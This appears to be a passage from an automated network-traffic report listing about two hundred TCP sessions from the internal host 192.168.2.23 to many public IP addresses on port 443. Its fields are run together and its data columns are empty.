                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14133192.168.2.2334824163.141.74.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14134192.168.2.2358822191.222.20.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14135192.168.2.2343694156.0.53.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14136192.168.2.2355176180.129.238.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14137192.168.2.236066613.206.36.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14138192.168.2.233447042.103.175.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14139192.168.2.234341479.83.19.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14140192.168.2.234459278.0.7.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14141192.168.2.2348342176.57.146.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14142192.168.2.2335168194.249.176.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14143192.168.2.235151653.45.195.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14144192.168.2.2359680186.95.226.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14145192.168.2.2355186115.35.229.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14146192.168.2.2347920113.138.210.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14147192.168.2.2339604173.18.203.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14148192.168.2.234256818.84.187.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14149192.168.2.233562058.231.36.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14150192.168.2.2357106155.15.108.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14151192.168.2.2341290185.86.196.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14152192.168.2.233781270.116.219.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14153192.168.2.235371062.207.132.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14154192.168.2.233681252.11.201.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14155192.168.2.2342724123.6.243.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14156192.168.2.2349774169.86.75.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14157192.168.2.2334674185.210.68.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14158192.168.2.234799871.99.189.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14159192.168.2.23431008.120.170.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14160192.168.2.23422609.159.246.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14161192.168.2.234689424.135.64.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14162192.168.2.234625614.102.235.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14163192.168.2.2334632166.97.226.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14164192.168.2.235357617.248.31.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14165192.168.2.2345722217.37.151.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14166192.168.2.2354966222.160.190.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14167192.168.2.2347674205.231.108.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14168192.168.2.2350886157.111.175.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14169192.168.2.233311640.145.86.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14170192.168.2.2351674200.162.4.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14171192.168.2.235544099.163.139.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14172192.168.2.2341628202.97.187.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14173192.168.2.234714264.137.171.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14174192.168.2.2360278212.156.141.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14175192.168.2.2342720130.200.165.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14176192.168.2.233415886.181.215.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14177192.168.2.2355104125.240.5.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14178192.168.2.2350138198.8.87.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14179192.168.2.23515585.162.243.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14180192.168.2.2356564167.84.25.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14181192.168.2.2354958166.99.231.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14182192.168.2.23535001.212.150.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14183192.168.2.236097682.219.16.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14184192.168.2.2337836121.45.221.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14185192.168.2.234076046.241.124.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14186192.168.2.2352200141.57.224.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14187192.168.2.2346682147.34.242.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14188192.168.2.2342524211.197.241.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14189192.168.2.234719436.57.88.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14190192.168.2.2355474150.198.126.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14191192.168.2.233804877.175.234.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14192192.168.2.234940251.208.246.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14193192.168.2.2334880141.157.27.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14194192.168.2.234713447.146.157.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14195192.168.2.2348520206.144.52.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14196192.168.2.2347876212.222.100.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14197192.168.2.2333392121.151.22.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14198192.168.2.235839654.120.9.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14199192.168.2.23560322.204.232.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14200192.168.2.234590860.189.132.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14201192.168.2.2337134185.190.188.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14202192.168.2.2343878202.236.187.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14203192.168.2.2338734136.2.186.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14204192.168.2.235108299.70.156.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14205192.168.2.235709676.4.69.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14206192.168.2.2338558148.255.246.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14207192.168.2.234508675.16.230.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14208192.168.2.2333494116.50.248.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14209192.168.2.23404604.136.108.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14210192.168.2.2348456223.73.170.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14211192.168.2.233416289.67.250.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14212192.168.2.233868491.95.113.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14213192.168.2.235318096.69.238.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14214192.168.2.234575045.176.11.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14215192.168.2.2341564145.209.222.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14216192.168.2.2344168199.41.220.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14217192.168.2.234753865.25.164.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14218192.168.2.235626861.153.10.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14219192.168.2.2355564151.125.122.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14220192.168.2.2348722185.228.118.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14221192.168.2.235065461.221.94.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14222192.168.2.2335046158.22.9.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14223192.168.2.2341410121.66.151.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14224192.168.2.234563657.83.113.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14225192.168.2.235260252.11.16.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14226192.168.2.2349404145.56.218.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14227192.168.2.233984668.29.235.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14228192.168.2.2349508197.163.199.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14229192.168.2.235933023.192.245.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14230192.168.2.235408883.86.220.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14231192.168.2.234829891.116.96.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14232192.168.2.2358700111.163.23.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14233192.168.2.2338352128.159.97.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14234192.168.2.2345562162.81.25.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14235192.168.2.234036690.109.72.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14236192.168.2.234714276.160.61.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14237192.168.2.233524463.60.253.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14238192.168.2.235667017.117.122.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14239192.168.2.2360860110.107.124.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14240192.168.2.234388473.175.175.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14241192.168.2.2336566138.92.106.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14242192.168.2.234090451.106.250.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14243192.168.2.234804863.27.135.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14244192.168.2.2348940134.119.73.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14245192.168.2.2343372219.119.145.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14246192.168.2.2357552173.77.130.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14247192.168.2.2342682111.163.87.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14248192.168.2.235712095.93.36.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14249192.168.2.2359370210.114.34.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14250192.168.2.2338748108.9.141.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14251192.168.2.2339502206.172.73.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14252192.168.2.2359520174.21.37.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14253192.168.2.2350886123.219.114.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14254192.168.2.235020678.205.152.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14255192.168.2.234227493.93.30.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14256192.168.2.2347198191.99.136.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14257192.168.2.235212068.241.104.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14258192.168.2.235241635.192.237.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14259192.168.2.233586873.251.145.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14260192.168.2.2355642114.176.179.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14261192.168.2.233308885.247.86.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14262192.168.2.2360838205.184.108.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14263192.168.2.2354992124.214.100.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14264192.168.2.2359386162.158.16.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14265192.168.2.2341332178.2.151.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14266192.168.2.2360798159.212.220.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14267192.168.2.2351452146.118.124.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14268192.168.2.235245046.101.25.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14269192.168.2.235156419.244.33.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14270192.168.2.233584620.85.243.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14271192.168.2.2351558210.43.231.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14272192.168.2.234521218.0.194.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14273192.168.2.2353134220.5.159.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14274192.168.2.234118663.16.75.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14275192.168.2.235077659.55.192.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14276192.168.2.235005824.100.189.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14277192.168.2.234738859.215.172.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14278192.168.2.233817831.187.114.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14279192.168.2.2338502115.129.114.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14280192.168.2.234141824.210.3.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14281192.168.2.233965868.196.141.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14282192.168.2.2341650110.71.10.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14283192.168.2.2358032147.57.177.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14284192.168.2.2359296183.146.67.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14285192.168.2.235384613.127.49.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14286192.168.2.2334506223.237.132.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14287192.168.2.2352870120.166.31.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14288192.168.2.2341894137.26.207.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14289192.168.2.2336984179.38.123.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14290192.168.2.2358708148.9.72.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14291192.168.2.2344824160.145.131.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14292192.168.2.2359320134.15.49.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14293192.168.2.235883084.233.120.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14294192.168.2.234067623.103.201.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14295192.168.2.2343032141.164.103.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14296192.168.2.235961044.107.144.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14297192.168.2.2359486141.124.253.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14298192.168.2.235324060.213.7.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14299192.168.2.2334672196.20.93.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14300192.168.2.234273235.228.239.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14301192.168.2.234692624.220.97.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14302192.168.2.233378227.135.19.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14303192.168.2.2349888189.15.194.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14304192.168.2.2347374186.104.135.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14305192.168.2.2357478218.9.26.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14306192.168.2.2359936181.124.159.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14307192.168.2.235168299.51.229.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14308192.168.2.2358684150.80.88.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14309192.168.2.233559045.130.219.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14310192.168.2.2351600179.170.236.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14311192.168.2.2340800221.167.213.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14312192.168.2.234468042.215.178.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14313192.168.2.2333158101.222.81.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14314192.168.2.2342430138.30.63.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14315192.168.2.2335002143.104.208.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14316192.168.2.2339140177.141.178.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14317192.168.2.2344804185.101.119.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14318192.168.2.2360244202.242.104.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14319192.168.2.2347118124.5.165.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14320192.168.2.2339240106.248.89.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14321192.168.2.2336828183.115.46.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14322192.168.2.2354110148.35.193.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14323192.168.2.235402696.182.89.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14324192.168.2.2341658137.106.223.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14325192.168.2.2350916113.65.43.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14326192.168.2.235944073.30.233.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14327192.168.2.235834078.44.22.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14328192.168.2.2336288221.174.73.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14329192.168.2.233997267.171.132.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14330192.168.2.2356518159.184.210.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14331192.168.2.234763096.54.74.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14332192.168.2.2335706123.134.173.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14333192.168.2.2353918186.118.247.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14334192.168.2.2336270124.144.249.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14335192.168.2.233777046.222.80.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14336192.168.2.234123237.220.51.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14337192.168.2.2334736165.170.68.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14338192.168.2.23417024.39.186.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14339192.168.2.233296881.193.124.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14340192.168.2.2360638133.74.19.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14341192.168.2.2339072141.204.250.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14342192.168.2.2353884167.97.21.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14343192.168.2.2343782167.111.50.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14344192.168.2.2343934191.58.216.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14345192.168.2.2354294129.91.79.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14346192.168.2.23535865.241.56.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14347192.168.2.23510268.153.236.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14348192.168.2.2357932213.4.149.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14349192.168.2.234451244.119.2.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14350192.168.2.2357914120.203.144.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14351192.168.2.2343772149.9.10.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14352192.168.2.2355692161.14.201.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14353192.168.2.234212695.159.119.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14354192.168.2.23586581.85.86.92443
